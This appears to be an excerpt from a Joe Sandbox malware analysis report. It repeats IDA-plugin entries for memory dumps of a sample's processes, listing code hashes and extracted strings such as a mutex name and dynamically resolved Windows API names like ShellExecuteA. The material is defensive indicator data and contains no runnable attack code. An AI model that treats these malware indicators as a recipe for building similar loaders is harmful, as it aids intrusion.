• Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction ID: d2191262b13b19fff7454ae18d8aabd0476e1db9aac594bbc95952f01509cb6c
• Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction Fuzzy Hash: DF613E7164028CEBEF11DF60CC49FAA3768FB04701F544515EE09BE3E2D6B55A448BAA
Memory Dump Source
• Source File: 00000023.00000002.4178379920.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7f0000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 11f47da716561d2096711fe3526464a5c587c868d7252386184446dedc58397a
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: B9B12C75A0028D8FEF10DF14CD44BA937A5FF44304F484965DD09AF3A2D379AA94CB9A
Strings
Memory Dump Source
• Source File: 00000023.00000002.4178379920.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_7f0000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
• Instruction ID: b42a2f5b0ae3a4c38c3da36e37a71cef30f60babda9e447160652bb387786a32
• Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
• Instruction Fuzzy Hash: 5711DB7124428DABEF10DEA08D4DFED37A8AF84B05F444415BA09FE2E1DAB59640877E
Strings
Memory Dump Source
• Source File: 00000024.00000002.4186738020.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_c90000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction ID: b402ca5e5e001f2d375250d6809631e199c7655ff3a1179eb084ebd5b65d4433
• Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction Fuzzy Hash: 53614F71640288AFEF10DF60CC4DFAA3768EF04B05F640515EE19BE1F1D6B1AA449B5E
Memory Dump Source
• Source File: 00000024.00000002.4186738020.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_c90000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: fb56a7527caaf12563075fab71d83344ac5bd42aa8249c8b9c7095e5f57864ed
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: E4B15931A002898FEF10CF64CC48BA937A5FF54314F694825DC1DAF2A1D775AB94DB8A
Strings
Memory Dump Source
• Source File: 00000024.00000002.4186738020.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_c90000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
• Instruction ID: 58b5a0400c8505086555b76d80215247e82b6d4521dfdd6a9a73287f2809a176
• Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
• Instruction Fuzzy Hash: FF11DB71244689AFEF10DFA08D4DFE937A9AB84B05F544415BA09FE0E0DAB19740876E
Strings
Memory Dump Source
• Source File: 00000025.00000002.4200924130.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_1290000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction ID: 5e70be7e9da449a56b6e67ad23130937de59dc5ca2fdd08e871b99ec01bce805
• Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction Fuzzy Hash: 20614D7165028DABEF11DFA8CC49FAA376CEF04B05F440515FE09BE1E0D6B1A6448B6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000025.00000002.4200924130.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_37_2_1290000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: bcec666756b16cb791e1dce934acb681a0a50c460a929a195bdcd5370a911316
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: ADB12C71A1018E8FEF15CF18CC44BA937A9FF44314F484925EE09AF2A1D375AA94CB4E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000025.00000002.4200924130.0000000001290000.00000040.00000001.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_37_2_1290000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: aaaca7f6e4b603e87f92829ab5da22ad6742bedf69e509a9e6d97b06c5afa13e
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 42111B71650289ABEF11DEA88D4DFED37ACAB84B01F440415BB09FE0E0DAB19200872E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000026.00000002.4199006634.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_38_2_f60000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: c0c1625fb972d78676509f8ec7fbafdc677bb8920868b6c6e5c8cf15cc7185d2
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 18618171640288ABEF10DF60CC49FEB3768EF05711F640515FE09BE1E1DAB156449B5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000026.00000002.4199006634.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_38_2_f60000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: e2c79bb9501d0788d93122cb9c453c413aa447e8d1bf1422ef3893417cd7bbb2
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 09B15D35A002898FEF10CF64CC44BAA37A5FF44314F684925DC0DAF2A1DB75AA94DF4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000026.00000002.4199006634.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_38_2_f60000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 85b9b3c7cf16878999bb9c3410d87ab1a55961ab8762ba7f9a61741f436543a7
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: F3112D31640288ABEF11DEA08D5DFEE37A8AF94B01F540415FA09FE0E0DAB19600972F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000027.00000002.4186189848.0000000000DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_39_2_da0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: ffd0a290d01c54f37b6e731d7db502d5f7bb1ec03adc87292bd531120861317b
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: B7615071640388ABEF10DF60CC49FEA3B68EF06705F544515EE49BE1E0D7B1A6448B6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000027.00000002.4186189848.0000000000DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_39_2_da0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: cf9986b4c54e8e42be83201b279c06c92ffa2faaeadf48186a354cec698e7590
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 75B13975A002898FEF10CF24CC44BA93BA5FF45304F4C4925DD49AF2A1D375AA95CFAA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000027.00000002.4186189848.0000000000DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_39_2_da0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 2d333d3777cdb153510c282c3599c34410d0fe11d704f13891f7bd2cf8efc2c0
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: CF11ED71244389ABEF10DEA08D4DFE937A8AF85B05F484415FA09FE0E0DAB59640877F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000028.00000002.4182558170.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_40_2_7d0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: 38b85e9eb659ef02ffc2b7647941bd92a6d74d7ffe0409de7d76ad55ec40bcd2
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: A0615D71640289EBEF10DF60CC4DFAE3778EB44701F541516EE09BE2E0D6B5AA448B9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000028.00000002.4182558170.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_40_2_7d0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: f73ea75220bde8bd69dc00e937059369a65fc715ebf50a15d986ab561d2cee19
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: 21B12775A002898FEF10CF24CD44BA937B5FF44314F485926DD09AF3A1D379AA94CB9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000028.00000002.4182558170.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_40_2_7d0000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 907507b37a6db7bec12c750b1458ef0377fa83188bc63b6da209ce8d4015cd23
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: AA112131240288ABEF10DEA08D4DFDD37A8AF54B01F441415FA09FE1E0DAB5A700876F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000029.00000002.4186741055.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_41_2_b90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                            • API String ID: 0-162185446
                                                                                                            • Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction ID: efe4b3745de60f69294dbd33d3736ba1c6c8ffc017fe6f1c9e02df1edc8cc2ee
                                                                                                            • Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
                                                                                                            • Instruction Fuzzy Hash: 7B616071650288AFEF10EF60CC89FAA37A8EF04B01F540565FE09BE1F0D6B196448B1E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000029.00000002.4186741055.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_41_2_b90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction ID: bbcabdb9d06c0c4eb48eef452401be8fa713c13d8328e3c11823ba990f65179c
                                                                                                            • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                            • Instruction Fuzzy Hash: B7B15C31A102898FEF10DF68CC84BA937E5FF54314F484865DC0DAF2A1D375AA94CB9A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000029.00000002.4186741055.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_41_2_b90000_kgTxkwCMEtRJHvgbWwUB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                            • API String ID: 0-1163154406
                                                                                                            • Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction ID: 5a47a8ec28f9962944f0926895bece027f24397ba12330e5795cb50478d546e9
                                                                                                            • Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
                                                                                                            • Instruction Fuzzy Hash: 68111E31250288AFEF10EFA08D4DFE937A8EB44B01F440425BA09FE0E0DAB19600872E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000002A.00000002.4188308724.0000000000BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_bb0000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction ID: 14e0f744825c6d34f50918885119d68434059b138416056687f32b5c91954d94
• Opcode Fuzzy Hash: 25d34fcfa08bee20ed82ebc0715e4d2743477a79526f1c7a5b694e840a098069
• Instruction Fuzzy Hash: 11614E71650288ABEF11EF60CC89FFA37A8EF04701F544555FE09BE1E0D6B196448B5E
Memory Dump Source
• Source File: 0000002A.00000002.4188308724.0000000000BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_bb0000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 5d493dd25b81d6e6c1f90470409fb383b2df5cd0123922dcba9aaf5f3288c0f8
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: 03B12B71A102898FEB10DF18CC44BFA77E5FF44304F484965DC49AF2A1D7B5AA94CB4A
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4188308724.0000000000BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_bb0000_kgTxkwCMEtRJHvgbWwUB.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
• Opcode ID: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
• Instruction ID: 6b23feb8cf80716847a1bb2b612afbaf4052b3bb6d205ed77e83b157567e329f
• Opcode Fuzzy Hash: b09fcdc90d481aa918e1e9c948669c78c59037ac802c4bdfae635c007d394e48
• Instruction Fuzzy Hash: 5411DE71254289ABEF10EEA08D4DFFE37A8EB44B05F444455BA09FE0E0DAF19644876E